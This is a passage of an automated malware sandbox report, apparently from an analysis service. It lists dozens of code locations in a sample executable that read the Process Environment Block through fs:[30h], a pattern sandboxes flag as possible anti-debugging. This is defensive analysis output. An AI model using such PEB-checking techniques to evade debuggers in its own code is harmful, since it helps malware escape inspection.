                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E645D mov eax, dword ptr fs:[00000030h]2_2_010E645D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111A470 mov eax, dword ptr fs:[00000030h]2_2_0111A470
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111A470 mov eax, dword ptr fs:[00000030h]2_2_0111A470
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111A470 mov eax, dword ptr fs:[00000030h]2_2_0111A470
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117C460 mov ecx, dword ptr fs:[00000030h]2_2_0117C460
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AA49A mov eax, dword ptr fs:[00000030h]2_2_011AA49A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011244B0 mov ecx, dword ptr fs:[00000030h]2_2_011244B0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F64AB mov eax, dword ptr fs:[00000030h]2_2_010F64AB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117A4B0 mov eax, dword ptr fs:[00000030h]2_2_0117A4B0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F04E5 mov ecx, dword ptr fs:[00000030h]2_2_010F04E5
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01120710 mov eax, dword ptr fs:[00000030h]2_2_01120710
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C700 mov eax, dword ptr fs:[00000030h]2_2_0112C700
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F0710 mov eax, dword ptr fs:[00000030h]2_2_010F0710
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116C730 mov eax, dword ptr fs:[00000030h]2_2_0116C730
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112273C mov eax, dword ptr fs:[00000030h]2_2_0112273C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112273C mov ecx, dword ptr fs:[00000030h]2_2_0112273C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112273C mov eax, dword ptr fs:[00000030h]2_2_0112273C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C720 mov eax, dword ptr fs:[00000030h]2_2_0112C720
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C720 mov eax, dword ptr fs:[00000030h]2_2_0112C720
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01174755 mov eax, dword ptr fs:[00000030h]2_2_01174755
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132750 mov eax, dword ptr fs:[00000030h]2_2_01132750
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132750 mov eax, dword ptr fs:[00000030h]2_2_01132750
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117E75D mov eax, dword ptr fs:[00000030h]2_2_0117E75D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112674D mov esi, dword ptr fs:[00000030h]2_2_0112674D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112674D mov eax, dword ptr fs:[00000030h]2_2_0112674D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112674D mov eax, dword ptr fs:[00000030h]2_2_0112674D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F0750 mov eax, dword ptr fs:[00000030h]2_2_010F0750
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100770 mov eax, dword ptr fs:[00000030h]2_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8770 mov eax, dword ptr fs:[00000030h]2_2_010F8770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119678E mov eax, dword ptr fs:[00000030h]2_2_0119678E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F07AF mov eax, dword ptr fs:[00000030h]2_2_010F07AF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A47A0 mov eax, dword ptr fs:[00000030h]2_2_011A47A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FC7C0 mov eax, dword ptr fs:[00000030h]2_2_010FC7C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011707C3 mov eax, dword ptr fs:[00000030h]2_2_011707C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F47FB mov eax, dword ptr fs:[00000030h]2_2_010F47FB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F47FB mov eax, dword ptr fs:[00000030h]2_2_010F47FB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117E7E1 mov eax, dword ptr fs:[00000030h]2_2_0117E7E1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011127ED mov eax, dword ptr fs:[00000030h]2_2_011127ED
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011127ED mov eax, dword ptr fs:[00000030h]2_2_011127ED
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011127ED mov eax, dword ptr fs:[00000030h]2_2_011127ED
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132619 mov eax, dword ptr fs:[00000030h]2_2_01132619
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110260B mov eax, dword ptr fs:[00000030h]2_2_0110260B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110260B mov eax, dword ptr fs:[00000030h]2_2_0110260B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110260B mov eax, dword ptr fs:[00000030h]2_2_0110260B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110260B mov eax, dword ptr fs:[00000030h]2_2_0110260B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110260B mov eax, dword ptr fs:[00000030h]2_2_0110260B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110260B mov eax, dword ptr fs:[00000030h]2_2_0110260B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110260B mov eax, dword ptr fs:[00000030h]2_2_0110260B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E609 mov eax, dword ptr fs:[00000030h]2_2_0116E609
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F262C mov eax, dword ptr fs:[00000030h]2_2_010F262C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01126620 mov eax, dword ptr fs:[00000030h]2_2_01126620
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01128620 mov eax, dword ptr fs:[00000030h]2_2_01128620
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E627 mov eax, dword ptr fs:[00000030h]2_2_0110E627
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110C640 mov eax, dword ptr fs:[00000030h]2_2_0110C640
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01122674 mov eax, dword ptr fs:[00000030h]2_2_01122674
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A660 mov eax, dword ptr fs:[00000030h]2_2_0112A660
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A660 mov eax, dword ptr fs:[00000030h]2_2_0112A660
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B866E mov eax, dword ptr fs:[00000030h]2_2_011B866E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B866E mov eax, dword ptr fs:[00000030h]2_2_011B866E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4690 mov eax, dword ptr fs:[00000030h]2_2_010F4690
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4690 mov eax, dword ptr fs:[00000030h]2_2_010F4690
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011266B0 mov eax, dword ptr fs:[00000030h]2_2_011266B0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C6A6 mov eax, dword ptr fs:[00000030h]2_2_0112C6A6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0112A6C7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A6C7 mov eax, dword ptr fs:[00000030h]2_2_0112A6C7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E6F2 mov eax, dword ptr fs:[00000030h]2_2_0116E6F2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E6F2 mov eax, dword ptr fs:[00000030h]2_2_0116E6F2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E6F2 mov eax, dword ptr fs:[00000030h]2_2_0116E6F2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E6F2 mov eax, dword ptr fs:[00000030h]2_2_0116E6F2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011706F1 mov eax, dword ptr fs:[00000030h]2_2_011706F1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011706F1 mov eax, dword ptr fs:[00000030h]2_2_011706F1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117C912 mov eax, dword ptr fs:[00000030h]2_2_0117C912
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8918 mov eax, dword ptr fs:[00000030h]2_2_010E8918
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8918 mov eax, dword ptr fs:[00000030h]2_2_010E8918
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E908 mov eax, dword ptr fs:[00000030h]2_2_0116E908
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116E908 mov eax, dword ptr fs:[00000030h]2_2_0116E908
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0118892B mov eax, dword ptr fs:[00000030h]2_2_0118892B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117892A mov eax, dword ptr fs:[00000030h]2_2_0117892A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01170946 mov eax, dword ptr fs:[00000030h]2_2_01170946
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4940 mov eax, dword ptr fs:[00000030h]2_2_011C4940
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01194978 mov eax, dword ptr fs:[00000030h]2_2_01194978
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01194978 mov eax, dword ptr fs:[00000030h]2_2_01194978
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117C97C mov eax, dword ptr fs:[00000030h]2_2_0117C97C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01116962 mov eax, dword ptr fs:[00000030h]2_2_01116962
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01116962 mov eax, dword ptr fs:[00000030h]2_2_01116962
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01116962 mov eax, dword ptr fs:[00000030h]2_2_01116962
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0113096E mov eax, dword ptr fs:[00000030h]2_2_0113096E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0113096E mov edx, dword ptr fs:[00000030h]2_2_0113096E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0113096E mov eax, dword ptr fs:[00000030h]2_2_0113096E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F09AD mov eax, dword ptr fs:[00000030h]2_2_010F09AD
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F09AD mov eax, dword ptr fs:[00000030h]2_2_010F09AD
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011789B3 mov esi, dword ptr fs:[00000030h]2_2_011789B3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011789B3 mov eax, dword ptr fs:[00000030h]2_2_011789B3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011789B3 mov eax, dword ptr fs:[00000030h]2_2_011789B3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A0 mov eax, dword ptr fs:[00000030h]2_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011249D0 mov eax, dword ptr fs:[00000030h]2_2_011249D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BA9D3 mov eax, dword ptr fs:[00000030h]2_2_011BA9D3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011869C0 mov eax, dword ptr fs:[00000030h]2_2_011869C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA9D0 mov eax, dword ptr fs:[00000030h]2_2_010FA9D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA9D0 mov eax, dword ptr fs:[00000030h]2_2_010FA9D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA9D0 mov eax, dword ptr fs:[00000030h]2_2_010FA9D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA9D0 mov eax, dword ptr fs:[00000030h]2_2_010FA9D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA9D0 mov eax, dword ptr fs:[00000030h]2_2_010FA9D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FA9D0 mov eax, dword ptr fs:[00000030h]2_2_010FA9D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011229F9 mov eax, dword ptr fs:[00000030h]2_2_011229F9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011229F9 mov eax, dword ptr fs:[00000030h]2_2_011229F9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117E9E0 mov eax, dword ptr fs:[00000030h]2_2_0117E9E0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117C810 mov eax, dword ptr fs:[00000030h]2_2_0117C810
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A830 mov eax, dword ptr fs:[00000030h]2_2_0112A830
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119483A mov eax, dword ptr fs:[00000030h]2_2_0119483A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119483A mov eax, dword ptr fs:[00000030h]2_2_0119483A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01112835 mov eax, dword ptr fs:[00000030h]2_2_01112835
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01112835 mov eax, dword ptr fs:[00000030h]2_2_01112835
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01112835 mov eax, dword ptr fs:[00000030h]2_2_01112835
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01112835 mov ecx, dword ptr fs:[00000030h]2_2_01112835
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01112835 mov eax, dword ptr fs:[00000030h]2_2_01112835
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01112835 mov eax, dword ptr fs:[00000030h]2_2_01112835
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01120854 mov eax, dword ptr fs:[00000030h]2_2_01120854
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01102840 mov ecx, dword ptr fs:[00000030h]2_2_01102840
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4859 mov eax, dword ptr fs:[00000030h]2_2_010F4859
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F4859 mov eax, dword ptr fs:[00000030h]2_2_010F4859
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117E872 mov eax, dword ptr fs:[00000030h]2_2_0117E872
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117E872 mov eax, dword ptr fs:[00000030h]2_2_0117E872
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01186870 mov eax, dword ptr fs:[00000030h]2_2_01186870
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01186870 mov eax, dword ptr fs:[00000030h]2_2_01186870
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F0887 mov eax, dword ptr fs:[00000030h]2_2_010F0887
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117C89D mov eax, dword ptr fs:[00000030h]2_2_0117C89D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E8C0 mov eax, dword ptr fs:[00000030h]2_2_0111E8C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C08C0 mov eax, dword ptr fs:[00000030h]2_2_011C08C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C8F9 mov eax, dword ptr fs:[00000030h]2_2_0112C8F9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C8F9 mov eax, dword ptr fs:[00000030h]2_2_0112C8F9
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BA8E4 mov eax, dword ptr fs:[00000030h]2_2_011BA8E4
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116EB1D mov eax, dword ptr fs:[00000030h]2_2_0116EB1D
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4B00 mov eax, dword ptr fs:[00000030h]2_2_011C4B00
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111EB20 mov eax, dword ptr fs:[00000030h]2_2_0111EB20
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111EB20 mov eax, dword ptr fs:[00000030h]2_2_0111EB20
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B8B28 mov eax, dword ptr fs:[00000030h]2_2_011B8B28
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B8B28 mov eax, dword ptr fs:[00000030h]2_2_011B8B28
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119EB50 mov eax, dword ptr fs:[00000030h]2_2_0119EB50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C2B57 mov eax, dword ptr fs:[00000030h]2_2_011C2B57
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C2B57 mov eax, dword ptr fs:[00000030h]2_2_011C2B57
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C2B57 mov eax, dword ptr fs:[00000030h]2_2_011C2B57
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C2B57 mov eax, dword ptr fs:[00000030h]2_2_011C2B57
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A4B4B mov eax, dword ptr fs:[00000030h]2_2_011A4B4B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A4B4B mov eax, dword ptr fs:[00000030h]2_2_011A4B4B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01186B40 mov eax, dword ptr fs:[00000030h]2_2_01186B40
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01186B40 mov eax, dword ptr fs:[00000030h]2_2_01186B40
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BAB40 mov eax, dword ptr fs:[00000030h]2_2_011BAB40
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01198B42 mov eax, dword ptr fs:[00000030h]2_2_01198B42
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E8B50 mov eax, dword ptr fs:[00000030h]2_2_010E8B50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010ECB7E mov eax, dword ptr fs:[00000030h]2_2_010ECB7E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A4BB0 mov eax, dword ptr fs:[00000030h]2_2_011A4BB0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A4BB0 mov eax, dword ptr fs:[00000030h]2_2_011A4BB0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100BBE mov eax, dword ptr fs:[00000030h]2_2_01100BBE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100BBE mov eax, dword ptr fs:[00000030h]2_2_01100BBE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F0BCD mov eax, dword ptr fs:[00000030h]2_2_010F0BCD
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F0BCD mov eax, dword ptr fs:[00000030h]2_2_010F0BCD
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F0BCD mov eax, dword ptr fs:[00000030h]2_2_010F0BCD
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119EBD0 mov eax, dword ptr fs:[00000030h]2_2_0119EBD0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01110BCB mov eax, dword ptr fs:[00000030h]2_2_01110BCB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01110BCB mov eax, dword ptr fs:[00000030h]2_2_01110BCB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01110BCB mov eax, dword ptr fs:[00000030h]2_2_01110BCB
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117CBF0 mov eax, dword ptr fs:[00000030h]2_2_0117CBF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111EBFC mov eax, dword ptr fs:[00000030h]2_2_0111EBFC
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8BF0 mov eax, dword ptr fs:[00000030h]2_2_010F8BF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8BF0 mov eax, dword ptr fs:[00000030h]2_2_010F8BF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8BF0 mov eax, dword ptr fs:[00000030h]2_2_010F8BF0
